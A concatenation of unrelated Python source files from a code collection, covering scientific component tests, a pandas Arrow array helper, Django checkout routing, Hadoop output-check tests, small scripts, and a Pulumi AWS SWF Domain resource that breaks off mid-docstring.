if version:
if name_and_type_equal and installed_tool_dependency.version == version:
return installed_tool_dependency
else:
if name_and_type_equal:
return installed_tool_dependency
return None
class HomebrewDependency(Dependency):
def __init__(self, commands, exact=True):
self.commands = commands
self._exact = exact
@property
def exact(self):
return self._exact
def shell_commands(self, requirement):
raw_commands = self.commands.replace("\n", ";")
return raw_commands
def __repr__(self):
return "PlatformBrewDependency[commands=%s]" % self.commands
|
py | 1a330b597d61ab527223f13a56aecfac95d4913e | """
Unit test each component in CADRE using some saved data from John's CMF implementation.
"""
import unittest
from parameterized import parameterized
import numpy as np
from openmdao.api import Problem
from CADRE.attitude import Attitude_Angular, Attitude_AngularRates, \
Attitude_Attitude, Attitude_Roll, Attitude_RotationMtx, \
Attitude_RotationMtxRates, Attitude_Sideslip, Attitude_Torque
from CADRE.battery import BatterySOC, BatteryPower, BatteryConstraints
from CADRE.comm import Comm_DataDownloaded, Comm_AntRotation, Comm_AntRotationMtx, \
Comm_BitRate, Comm_Distance, Comm_EarthsSpin, Comm_EarthsSpinMtx, Comm_GainPattern, \
Comm_GSposEarth, Comm_GSposECI, Comm_LOS, Comm_VectorAnt, Comm_VectorBody, \
Comm_VectorECI, Comm_VectorSpherical
from CADRE.orbit import Orbit_Dynamics # , Orbit_Initial
from CADRE.parameters import BsplineParameters
from CADRE.power import Power_CellVoltage, Power_SolarPower, Power_Total
from CADRE.reactionwheel import ReactionWheel_Motor, ReactionWheel_Power, \
ReactionWheel_Torque, ReactionWheel_Dynamics
from CADRE.solar import Solar_ExposedArea
from CADRE.sun import Sun_LOS, Sun_PositionBody, Sun_PositionECI, Sun_PositionSpherical
from CADRE.thermal_temperature import ThermalTemperature
from CADRE.test.util import load_validation_data
#
# component types to test
#
component_types = [
# from CADRE.attitude
Attitude_Angular, Attitude_AngularRates,
Attitude_Attitude, Attitude_Roll, Attitude_RotationMtx,
Attitude_RotationMtxRates, Attitude_Sideslip, Attitude_Torque,
# from CADRE.battery
BatterySOC, BatteryPower, BatteryConstraints,
# from CADRE.comm
Comm_DataDownloaded, Comm_AntRotation, Comm_AntRotationMtx,
Comm_BitRate, Comm_Distance, Comm_EarthsSpin, Comm_EarthsSpinMtx, Comm_GainPattern,
Comm_GSposEarth, Comm_GSposECI, Comm_LOS, Comm_VectorAnt, Comm_VectorBody,
Comm_VectorECI, Comm_VectorSpherical,
# from CADRE.orbit
Orbit_Dynamics, # Orbit_Initial was not recorded in John's pickle.
# from CADRE.parameters
BsplineParameters,
# from CADRE.power
Power_CellVoltage, Power_SolarPower, Power_Total,
# from CADRE.reactionwheel
ReactionWheel_Motor, ReactionWheel_Power,
ReactionWheel_Torque, ReactionWheel_Dynamics,
# from CADRE.solar
Solar_ExposedArea,
# from CADRE.sun
Sun_LOS, Sun_PositionBody, Sun_PositionECI, Sun_PositionSpherical,
# from CADRE.thermal_temperature
ThermalTemperature
]
#
# load saved data from John's CMF implementation.
#
n, m, h, setd = load_validation_data(idx='5')
class TestCADRE(unittest.TestCase):
@parameterized.expand([(_class.__name__, _class) for _class in component_types],
testcase_func_name=lambda f, n, p: 'test_' + p.args[0])
def test_component(self, name, comp_class):
try:
comp = comp_class(n)
except TypeError:
try:
comp = comp_class()
except TypeError:
comp = comp_class(n, 300)
self.assertTrue(isinstance(comp, comp_class),
'Could not create instance of %s' % comp_class.__name__)
prob = Problem(comp)
prob.setup()
prob.final_setup()
inputs = comp.list_inputs(out_stream=None)
outputs = comp.list_outputs(out_stream=None)
for var, meta in inputs:
if var in setd:
prob[var] = setd[var]
comp.h = h # some components need this
prob.run_model()
for var, meta in outputs:
if var in setd:
tval = setd[var]
assert(np.linalg.norm(tval - prob[var]) / np.linalg.norm(tval) < 1e-3), \
'%s: Expected\n%s\nbut got\n%s' % (var, str(tval), str(prob[var]))
if __name__ == "__main__":
unittest.main()
|
py | 1a330bb584ba55c6808920b273a8325eb7feeeff | """
Rudimentary Apache Arrow-backed ExtensionArray.
At the moment, just a boolean array / type is implemented.
Eventually, we'll want to parametrize the type and support
multiple dtypes. Not all methods are implemented yet, and the
current implementation is not efficient.
"""
from __future__ import annotations
import copy
import itertools
import operator
import numpy as np
import pyarrow as pa
from pandas._typing import type_t
import pandas as pd
from pandas.api.extensions import (
ExtensionArray,
ExtensionDtype,
register_extension_dtype,
take,
)
from pandas.api.types import is_scalar
from pandas.core.arraylike import OpsMixin
@register_extension_dtype
class ArrowBoolDtype(ExtensionDtype):
type = np.bool_
kind = "b"
name = "arrow_bool"
na_value = pa.NULL
@classmethod
def construct_array_type(cls) -> type_t[ArrowBoolArray]:
"""
Return the array type associated with this dtype.
Returns
-------
type
"""
return ArrowBoolArray
@property
def _is_boolean(self) -> bool:
return True
@register_extension_dtype
class ArrowStringDtype(ExtensionDtype):
type = str
kind = "U"
name = "arrow_string"
na_value = pa.NULL
@classmethod
def construct_array_type(cls) -> type_t[ArrowStringArray]:
"""
Return the array type associated with this dtype.
Returns
-------
type
"""
return ArrowStringArray
class ArrowExtensionArray(OpsMixin, ExtensionArray):
_data: pa.ChunkedArray
@classmethod
def from_scalars(cls, values):
arr = pa.chunked_array([pa.array(np.asarray(values))])
return cls(arr)
@classmethod
def from_array(cls, arr):
assert isinstance(arr, pa.Array)
return cls(pa.chunked_array([arr]))
@classmethod
def _from_sequence(cls, scalars, dtype=None, copy=False):
return cls.from_scalars(scalars)
def __repr__(self):
return f"{type(self).__name__}({repr(self._data)})"
def __getitem__(self, item):
if is_scalar(item):
return self._data.to_pandas()[item]
else:
vals = self._data.to_pandas()[item]
return type(self).from_scalars(vals)
def __len__(self):
return len(self._data)
def astype(self, dtype, copy=True):
# needed to fix this astype for the Series constructor.
if isinstance(dtype, type(self.dtype)) and dtype == self.dtype:
if copy:
return self.copy()
return self
return super().astype(dtype, copy)
@property
def dtype(self):
return self._dtype
def _logical_method(self, other, op):
if not isinstance(other, type(self)):
raise NotImplementedError()
result = op(np.array(self._data), np.array(other._data))
return ArrowBoolArray(
pa.chunked_array([pa.array(result, mask=pd.isna(self._data.to_pandas()))])
)
def __eq__(self, other):
if not isinstance(other, type(self)):
return False
return self._logical_method(other, operator.eq)
@property
def nbytes(self) -> int:
return sum(
x.size
for chunk in self._data.chunks
for x in chunk.buffers()
if x is not None
)
def isna(self):
nas = pd.isna(self._data.to_pandas())
return type(self).from_scalars(nas)
def take(self, indices, allow_fill=False, fill_value=None):
data = self._data.to_pandas()
if allow_fill and fill_value is None:
fill_value = self.dtype.na_value
result = take(data, indices, fill_value=fill_value, allow_fill=allow_fill)
return self._from_sequence(result, dtype=self.dtype)
def copy(self):
return type(self)(copy.copy(self._data))
@classmethod
def _concat_same_type(cls, to_concat):
chunks = list(itertools.chain.from_iterable(x._data.chunks for x in to_concat))
arr = pa.chunked_array(chunks)
return cls(arr)
def __invert__(self):
return type(self).from_scalars(~self._data.to_pandas())
def _reduce(self, name: str, *, skipna: bool = True, **kwargs):
if skipna:
arr = self[~self.isna()]
else:
arr = self
try:
op = getattr(arr, name)
except AttributeError as err:
raise TypeError from err
return op(**kwargs)
def any(self, axis=0, out=None):
# Explicitly return a plain bool to reproduce GH-34660
return bool(self._data.to_pandas().any())
def all(self, axis=0, out=None):
# Explicitly return a plain bool to reproduce GH-34660
return bool(self._data.to_pandas().all())
class ArrowBoolArray(ArrowExtensionArray):
def __init__(self, values):
if not isinstance(values, pa.ChunkedArray):
raise ValueError
assert values.type == pa.bool_()
self._data = values
self._dtype = ArrowBoolDtype()
class ArrowStringArray(ArrowExtensionArray):
def __init__(self, values):
if not isinstance(values, pa.ChunkedArray):
raise ValueError
assert values.type == pa.string()
self._data = values
self._dtype = ArrowStringDtype()
|
py | 1a330bbae5ec2f7a35dab35e0e869fad09401af4 | from django.conf.urls.defaults import patterns, url
from oscar.core.application import Application
from oscar.apps.checkout.views import IndexView, ShippingAddressView, UserAddressDeleteView, UserAddressCreateView, \
UserAddressUpdateView, ShippingMethodView, PaymentMethodView, OrderPreviewView, \
PaymentDetailsView, ThankYouView
class CheckoutApplication(Application):
name = 'checkout'
index_view = IndexView
shipping_address_view = ShippingAddressView
user_address_create_view = UserAddressCreateView
user_address_update_view = UserAddressUpdateView
user_address_delete_view = UserAddressDeleteView
shipping_method_view = ShippingMethodView
payment_method_view = PaymentMethodView
order_preview_view = OrderPreviewView
payment_details_view = PaymentDetailsView
thankyou_view = ThankYouView
def get_urls(self):
urlpatterns = patterns('',
url(r'^$', self.index_view.as_view(), name='index'),
# Shipping/user address views
url(r'shipping-address/$', self.shipping_address_view.as_view(), name='shipping-address'),
url(r'user-address/create/$', self.user_address_create_view.as_view(), name='user-address-create'),
url(r'user-address/edit/(?P<pk>\d+)/$', self.user_address_update_view.as_view(), name='user-address-update'),
url(r'user-address/delete/(?P<pk>\d+)/$', self.user_address_delete_view.as_view(), name='user-address-delete'),
# Shipping method views
url(r'shipping-method/$', self.shipping_method_view.as_view(), name='shipping-method'),
# Payment method views
url(r'payment-method/$', self.payment_method_view.as_view(), name='payment-method'),
url(r'preview/$', self.order_preview_view.as_view(), name='preview'),
url(r'payment-details/$', self.payment_details_view.as_view(), name='payment-details'),
url(r'thank-you/$', self.thankyou_view.as_view(), name='thank-you'),
)
return urlpatterns
application = CheckoutApplication() |
py | 1a330d1552358212bb085051a0200c67c3f2be9e | # # coding:utf-8
# pypy use TEA complex
# from ctypes import *
# # from boostpy import TEA
#
#
# class Tea(object):
# """tea encrypt"""
#
# def __init__(self, loop=16, key=None):
# """init Tea object
#
# @param loop: default is 16
# @param key: default is *******
# """
# self.tea = TEA(loop, key) if key else TEA(loop)
#
# def _group(self, seq, size):
# while seq:
# yield seq[:size]
# seq = seq[size:]
#
# def encrypt(self, content):
# # encrypt content
# encode = ""
# _input = create_string_buffer(8)
# str_list = list(self._group(content, 8))
# for aStr in str_list:
# _input.value = aStr
# encode += self.tea.encrypt(_input.value)
#
# with open(r"/var/tmp/log.txt", 'w+') as f:
# f.write(encode)
# return encode
#
# def decrypt(self, encode):
# # decrypt content
# decode = ""
# str_list = list(self._group(encode, 8))
# for aStr in str_list:
# decode += self.tea.decrypt(aStr).strip('\x00')
#
# with open(r"/var/tmp/log2.txt", 'w+') as f:
# f.write(decode)
# return decode
#
#
# if __name__ == "__main__":
# t = Tea()
# num = 1
# s = "HELLO WORLD"
# # encode = t.encrypt(s)
#
# for i in xrange(1000):
# import random
# s = random.sample('zyxwvutsrqponmlkjihgfedcba _~!@#$%^&*()+=-1234567890', 40)
# s2 = ''.join(s)
# s2.strip()
# # s2 = 'unban account ism5'
# s3 = t.decrypt(t.encrypt(s2))
# if s3 != s2:
# print num," before:", s2, "after:", s3
# num += 1
|
py | 1a330d1ca4e8120d63cfa455b1fdab08b44a1efe | # flake8: noqa
import unittest
import logging
from unittest.mock import MagicMock
import subprocess
import hdfs.hdfs_application_runner as runner
class TestHdfsApplicationRunner(unittest.TestCase):
def setUp(self):
self.spark = runner.SparkHdfsTestRunner(logging)
self.mrgen = runner.MrTeragenRunner(logging)
self.mrsort = runner.MrTerasortRunner(logging)
def test_correct_output_spark(self):
output = str.encode("spark.yarn.driver.memoryOverhead is set but does not apply in client mode.\n" +
"Iteration 1 took 3692 ms\nIteration 2 took 87 ms\nIteration 3 took 65 ms\n" +
"Iteration 4 took 64 ms\nIteration 5 took 56 ms\nIteration 6 took 74 ms\n" +
"Iteration 7 took 60 ms\nIteration 8 took 60 ms\nIteration 9 took 51 ms\n" +
"Iteration 10 took 52 ms\n")
process = MagicMock(spec=subprocess.CompletedProcess, args=["test"], returncode=0, stdout=output, stderr=b'')
self.spark._check_output(process.stdout, process.stderr)
def test_error_on_wrong_output_spark(self):
output = str.encode("spark.yarn.driver.memoryOverhead is set but does not apply in client mode." +
"\nPi is roughly 2.1415471415471417")
process = MagicMock(spec=subprocess.CompletedProcess, args=["test"], returncode=21, stdout=output, stderr=b'')
with self.assertRaises(runner.SparkRequestError):
self.spark._check_output(process.stdout, process.stderr)
def test_error_on_wrong_output_spark_with_not_enough_iterations(self):
output = str.encode("spark.yarn.driver.memoryOverhead is set but does not apply in client mode.\n" +
"Iteration 1 took 3692 ms\n" +
"Iteration 4 took 64 ms\nIteration 5 took 56 ms\nIteration 6 took 74 ms\n" +
"Iteration 7 took 60 ms\nIteration 8 took 60 ms\nIteration 9 took 51 ms\n" +
"Iteration 10 took 52 ms\n")
process = MagicMock(spec=subprocess.CompletedProcess, args=["test"], returncode=21, stdout=output, stderr=b'')
with self.assertRaises(runner.SparkRequestError):
self.spark._check_output(process.stdout, process.stderr)
def test_correct_output_mr(self):
output = str.encode("""
17/02/23 11:24:07 INFO client.ConfiguredRMFailoverProxyProvider: Failing over to rm2
17/02/23 11:24:08 INFO mapreduce.JobSubmitter: number of splits:2
17/02/23 11:24:08 INFO mapreduce.JobSubmitter: Submitting tokens for job: job_1768772602026_0001
17/02/23 11:24:08 INFO mapreduce.JobSubmitter: Kind: HDFS_DELEGATION_TOKEN, Service: ha-hdfs:sndbx, Ident: (HDFS_DELEGATION_TOKEN token 1086442 for smoketest)
17/02/23 11:24:09 INFO impl.YarnClientImpl: Submitted application application_1768772602026_0001
17/02/23 11:24:09 INFO mapreduce.Job: The url to track the job: http://sandbox.hortonworks.com:8088/proxy/application_1768772602026_0001/
17/02/23 11:24:09 INFO mapreduce.Job: Running job: job_1768772602026_0001
17/02/23 11:24:24 INFO mapreduce.Job: Job job_1768772602026_0001 running in uber mode : false
17/02/23 11:24:24 INFO mapreduce.Job: map 0% reduce 0%
17/02/23 11:24:40 INFO mapreduce.Job: map 50% reduce 0%
17/02/23 11:24:50 INFO mapreduce.Job: map 100% reduce 0%
17/02/23 11:24:55 INFO mapreduce.Job: map 100% reduce 100%
17/02/23 11:24:55 INFO mapreduce.Job: Job job_1768772602026_0001 completed successfully
17/02/23 11:24:55 INFO mapreduce.Job: Counters: 50
\tFile System Counters
\t\tFILE: Number of bytes read=52000006
\t\tFILE: Number of bytes written=104468578
\t\tFILE: Number of read operations=0
\t\tHDFS: Number of write operations=2
""")
process = MagicMock(spec=subprocess.CompletedProcess, args=["test"], returncode=0, stdout=b'', stderr=output)
self.mrgen._check_output(process.stdout, process.stderr)
self.mrsort._check_output(process.stdout, process.stderr)
def test_error_on_wrong_output_mr(self):
output = str.encode("""
17/02/23 11:24:07 INFO client.ConfiguredRMFailoverProxyProvider: Failing over to rm2
17/02/23 11:24:08 INFO mapreduce.JobSubmitter: number of splits:2
17/02/23 11:24:08 INFO mapreduce.JobSubmitter: Submitting tokens for job: job_1768772602026_0001
17/02/23 11:24:08 INFO mapreduce.JobSubmitter: Kind: HDFS_DELEGATION_TOKEN, Service: ha-hdfs:sndbx, Ident: (HDFS_DELEGATION_TOKEN token 1086442 for smoketest)
17/02/23 11:24:09 INFO impl.YarnClientImpl: Submitted application application_1768772602026_0001
17/02/23 11:24:09 INFO mapreduce.Job: The url to track the job: http://sandbox.hortonworks.com:8088/proxy/application_1768772602026_0001/
17/02/23 11:24:09 INFO mapreduce.Job: Running job: job_1768772602026_0001
17/02/23 11:24:24 INFO mapreduce.Job: Job job_1768772602026_0001 running in uber mode : false
17/02/23 11:24:24 INFO mapreduce.Job: map 0% reduce 0%
17/02/23 11:24:40 INFO mapreduce.Job: map 50% reduce 0%
17/02/23 11:24:50 INFO mapreduce.Job: map 100% reduce 0%
17/02/23 11:24:55 INFO mapreduce.Job: map 100% reduce 100%
17/02/23 11:24:55 INFO mapreduce.Job: Job job_1768772602026_0001 FAILED
17/02/23 11:24:55 INFO mapreduce.Job: Counters: 49
""")
process = MagicMock(spec=subprocess.CompletedProcess, args=["test"], returncode=21, stdout=b'', stderr=output)
with self.assertRaises(runner.MrRequestError):
self.mrgen._check_output(process.stdout, process.stderr)
self.mrsort._check_output(process.stdout, process.stderr)
|
py | 1a330e25592716cd17cc6d4e8f6c67b9a5f743b1 |
def prepare_tls(config_dict):
config_dict['internal_tls'].prepare()
config_dict['internal_tls'].validate() |
py | 1a330f84b40dbee3cde047e9e049134b7c67853d | from warnings import warn
class ReadabilityException(Exception):
pass
def minimum_words_warning():
warn('100 words required for optimal accuracy.') |
py | 1a330fc4db4ea4183375f021473de06dfaaee8c8 | from random import choice, sample
cartas = {
chr(0x1f0a1): 11,
chr(0x1f0a2): 2,
chr(0x1f0a3): 3,
chr(0x1f0a4): 4,
chr(0x1f0a5): 5,
chr(0x1f0a6): 6,
chr(0x1f0a7): 7,
chr(0x1f0a8): 8,
chr(0x1f0a9): 9,
chr(0x1f0aa): 10,
chr(0x1f0ab): 10,
chr(0x1f0ad): 10,
chr(0x1f0ae): 10,
}
for carta, valor in cartas.items():
print("la carta {} vale {}".format(carta, valor))
print("Empieza el Black Jack")
lista_cartas = list(cartas)
main_jugador = sample(lista_cartas, 2)
score_jugador = sum(cartas[carta] for carta in main_jugador)
print("Te han tocado las cartas: {} {} , y su puntuación es {}.".format(main_jugador[0],
main_jugador[1],
score_jugador))
main_banca = sample(lista_cartas, 2)
score_banca = sum(cartas[carta] for carta in main_banca)
print("La banca tiene las cartas: {} {} , y su puntuación es {}.".format(main_banca[0],
main_banca[1],
score_banca)) |
py | 1a33107a9abe95f460b53de4b29ba66db6c9e249 | import csv
import os
#import pandas as pd
import numpy as np
import matplotlib as mpl
mpl.use('Agg')
import matplotlib.pyplot as plt
from matplotlib.lines import Line2D
#import scipy.stats as stats
def main():
test_dir = "length_500"
data = get_data(test_dir)
plot_aggregate_over_time(data, "schaffer", test_dir)
plot_stddev_over_time(data, "schaffer", test_dir)
plot_average_final_fitness(data, "schaffer", test_dir)
#plot_single_run_over_time(data[data.keys()[0]]["1"]["average_experienced"], test_dir)
#print data.keys()[0]
def get_data(common_dir):
data = {}
for d in os.listdir(common_dir):
if not os.path.isdir(common_dir + "/" + d):
continue
dir_name_list = d.split("/")[-1].split("_")
idnum = dir_name_list[-1]
config = "_".join(dir_name_list[:-1])
if config in data:
data[config][idnum] = {}
else:
data[config] = {}
data[config][idnum] = {}
with open(common_dir+"/"+d+"/correlation.dat") as infile:
data[config][idnum]["correlation"] = float(infile.readline())
data[config][idnum]["average_experienced"] = import_csv(common_dir+"/"+d+"/experienced_fitnesses.csv")
data[config][idnum]["average_reference"] = import_csv(common_dir+"/"+d+"/reference_fitnesses.csv")
#data[config][idnum]["best_experienced"] = import_csv(common_dir+"/"+d+"/experienced_best_fitnesses.csv")
#data[config][idnum]["best_reference"] = import_csv(common_dir+"/"+d+"/reference_best_fitnesses.csv")
return data
def import_csv(file_name):
with open(file_name, "rb") as csvfile:
csv_reader = csv.reader(csvfile)
data = []
data.append(csv_reader.next())
#print(data)
for row in csv_reader:
#print(row)
data.append([float(i) for i in row])
return data
def plot_single_run_over_time(single_run_data, directory):
plt.clear()
plt.plot(single_run_data["Generation"], np.log(single_run_data["Average_Fitness"]))
plt.savefig(directory+"/single_run_over_time.png")
def plot_aggregate_over_time(data, key=None, directory="."):
plt.clf()
lines = {}
for config in data:
if (key != None and key not in config):
continue
series = []
for run in data[config]:
series.append([])
for i in range(1, len(data[config][run]["average_reference"])):
series[-1].append(data[config][run]["average_reference"][i][1])
averages = []
#stdevs = []
for i in range(len(series[0])):
add_factor = 0
if "rana" in config:
add_factor = 20000
logs = [np.log(s[i]+add_factor) for s in series]
averages.append(sum(logs)/float(len(logs)))
lines[config] = Line2D(data[config][data[config].keys()[0]]["average_reference"][0], averages)
x = []
for i in range(1,len(data[config][data[config].keys()[0]]["average_reference"])):
x.append(data[config][data[config].keys()[0]]["average_reference"][i][0])
plt.plot(x, averages, hold=True, label=config)
plt.legend(loc="upper right")
plt.xlabel("Generation")
plt.ylabel("Average Fitness")
#plt.figlegend([lines[l] for l in lines], [l for l in lines])
plt.savefig(directory+"/runs_over_time_"+key+"_2500gen.png")
def plot_stddev_over_time(data, key=None, directory="."):
plt.clf()
lines = {}
for config in data:
if (key != None and key not in config):
continue
series = []
for run in data[config]:
series.append([])
for i in range(1, len(data[config][run]["average_reference"])):
series[-1].append(data[config][run]["average_reference"][i][2])
averages = []
#stdevs = []
for i in range(len(series[0])):
add_factor = 0
if "rana" in config:
add_factor = 20000
devs = [s[i] for s in series]
averages.append(sum(devs)/float(len(devs)))
lines[config] = Line2D(data[config][data[config].keys()[0]]["average_reference"][0], averages)
x = []
for i in range(1,len(data[config][data[config].keys()[0]]["average_reference"])):
x.append(data[config][data[config].keys()[0]]["average_reference"][i][0])
plt.plot(x, averages, hold=True, label=config)
plt.legend(loc="upper right")
plt.xlabel("Generation")
plt.ylabel("Average Fitness")
#plt.figlegend([lines[l] for l in lines], [l for l in lines])
plt.savefig(directory+"/diversity_over_time_"+key+"_2500gen.png")
def plot_average_final_fitness(data, key=None, directory="."):
plt.clf()
corrs = []
finals = []
for config in data:
if key == None or key in config:
for run in data[config]:
corrs.append(data[config][run]["correlation"])
add_factor=0
if "rana" in config:
add_factor = 20000
finals.append(add_factor+float(data[config][run]["average_reference"][-1][1]))
#finals.append(float(data[config][run]["best_reference"]["Best_fitness"][-1:]))
plt.plot(corrs, np.log(finals), ".")
plt.xlabel("Correlation")
plt.ylabel("Average Fitness")
plt.savefig(directory+"/correlation_vs_final_fitness_scatter_"+key+".png")
if __name__ == "__main__":
main()
|
py | 1a3310a4feb307379b973f73e43c2195b5d19b61 | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['DomainArgs', 'Domain']
@pulumi.input_type
class DomainArgs:
def __init__(__self__, *,
workflow_execution_retention_period_in_days: pulumi.Input[str],
description: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
name_prefix: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
"""
The set of arguments for constructing a Domain resource.
:param pulumi.Input[str] workflow_execution_retention_period_in_days: Length of time that SWF will continue to retain information about the workflow execution after the workflow execution is complete, must be between 0 and 90 days.
:param pulumi.Input[str] description: The domain description.
:param pulumi.Input[str] name: The name of the domain. If omitted, this provider will assign a random, unique name.
:param pulumi.Input[str] name_prefix: Creates a unique name beginning with the specified prefix. Conflicts with `name`.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Key-value map of resource tags. .If configured with a provider `default_tags` configuration block present, tags with matching keys will overwrite those defined at the provider-level.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags_all: A map of tags assigned to the resource, including those inherited from the provider .
"""
pulumi.set(__self__, "workflow_execution_retention_period_in_days", workflow_execution_retention_period_in_days)
if description is not None:
pulumi.set(__self__, "description", description)
if name is not None:
pulumi.set(__self__, "name", name)
if name_prefix is not None:
pulumi.set(__self__, "name_prefix", name_prefix)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if tags_all is not None:
pulumi.set(__self__, "tags_all", tags_all)
@property
@pulumi.getter(name="workflowExecutionRetentionPeriodInDays")
def workflow_execution_retention_period_in_days(self) -> pulumi.Input[str]:
"""
Length of time that SWF will continue to retain information about the workflow execution after the workflow execution is complete, must be between 0 and 90 days.
"""
return pulumi.get(self, "workflow_execution_retention_period_in_days")
@workflow_execution_retention_period_in_days.setter
def workflow_execution_retention_period_in_days(self, value: pulumi.Input[str]):
pulumi.set(self, "workflow_execution_retention_period_in_days", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
The domain description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the domain. If omitted, this provider will assign a random, unique name.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="namePrefix")
def name_prefix(self) -> Optional[pulumi.Input[str]]:
"""
Creates a unique name beginning with the specified prefix. Conflicts with `name`.
"""
return pulumi.get(self, "name_prefix")
@name_prefix.setter
def name_prefix(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name_prefix", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Key-value map of resource tags. .If configured with a provider `default_tags` configuration block present, tags with matching keys will overwrite those defined at the provider-level.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter(name="tagsAll")
def tags_all(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A map of tags assigned to the resource, including those inherited from the provider .
"""
return pulumi.get(self, "tags_all")
@tags_all.setter
def tags_all(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags_all", value)
@pulumi.input_type
class _DomainState:
def __init__(__self__, *,
arn: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
name_prefix: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
workflow_execution_retention_period_in_days: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering Domain resources.
:param pulumi.Input[str] arn: Amazon Resource Name (ARN)
:param pulumi.Input[str] description: The domain description.
:param pulumi.Input[str] name: The name of the domain. If omitted, this provider will assign a random, unique name.
:param pulumi.Input[str] name_prefix: Creates a unique name beginning with the specified prefix. Conflicts with `name`.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Key-value map of resource tags. .If configured with a provider `default_tags` configuration block present, tags with matching keys will overwrite those defined at the provider-level.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags_all: A map of tags assigned to the resource, including those inherited from the provider .
:param pulumi.Input[str] workflow_execution_retention_period_in_days: Length of time that SWF will continue to retain information about the workflow execution after the workflow execution is complete, must be between 0 and 90 days.
"""
if arn is not None:
pulumi.set(__self__, "arn", arn)
if description is not None:
pulumi.set(__self__, "description", description)
if name is not None:
pulumi.set(__self__, "name", name)
if name_prefix is not None:
pulumi.set(__self__, "name_prefix", name_prefix)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if tags_all is not None:
pulumi.set(__self__, "tags_all", tags_all)
if workflow_execution_retention_period_in_days is not None:
pulumi.set(__self__, "workflow_execution_retention_period_in_days", workflow_execution_retention_period_in_days)
@property
@pulumi.getter
def arn(self) -> Optional[pulumi.Input[str]]:
"""
Amazon Resource Name (ARN)
"""
return pulumi.get(self, "arn")
@arn.setter
def arn(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "arn", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
The domain description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the domain. If omitted, this provider will assign a random, unique name.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="namePrefix")
def name_prefix(self) -> Optional[pulumi.Input[str]]:
"""
Creates a unique name beginning with the specified prefix. Conflicts with `name`.
"""
return pulumi.get(self, "name_prefix")
@name_prefix.setter
def name_prefix(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name_prefix", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Key-value map of resource tags. .If configured with a provider `default_tags` configuration block present, tags with matching keys will overwrite those defined at the provider-level.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter(name="tagsAll")
def tags_all(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A map of tags assigned to the resource, including those inherited from the provider .
"""
return pulumi.get(self, "tags_all")
@tags_all.setter
def tags_all(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags_all", value)
@property
@pulumi.getter(name="workflowExecutionRetentionPeriodInDays")
def workflow_execution_retention_period_in_days(self) -> Optional[pulumi.Input[str]]:
"""
Length of time that SWF will continue to retain information about the workflow execution after the workflow execution is complete, must be between 0 and 90 days.
"""
return pulumi.get(self, "workflow_execution_retention_period_in_days")
@workflow_execution_retention_period_in_days.setter
def workflow_execution_retention_period_in_days(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "workflow_execution_retention_period_in_days", value)
class Domain(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
name_prefix: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
workflow_execution_retention_period_in_days: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Provides an SWF Domain resource.
## Example Usage
To register a basic SWF domain:
```python
import pulumi
import pulumi_aws as aws
foo = aws.swf.Domain("foo",
description="SWF Domain",
workflow_execution_retention_period_in_days="30")
```
## Import
SWF Domains can be imported using the `name`, e.g.
```sh
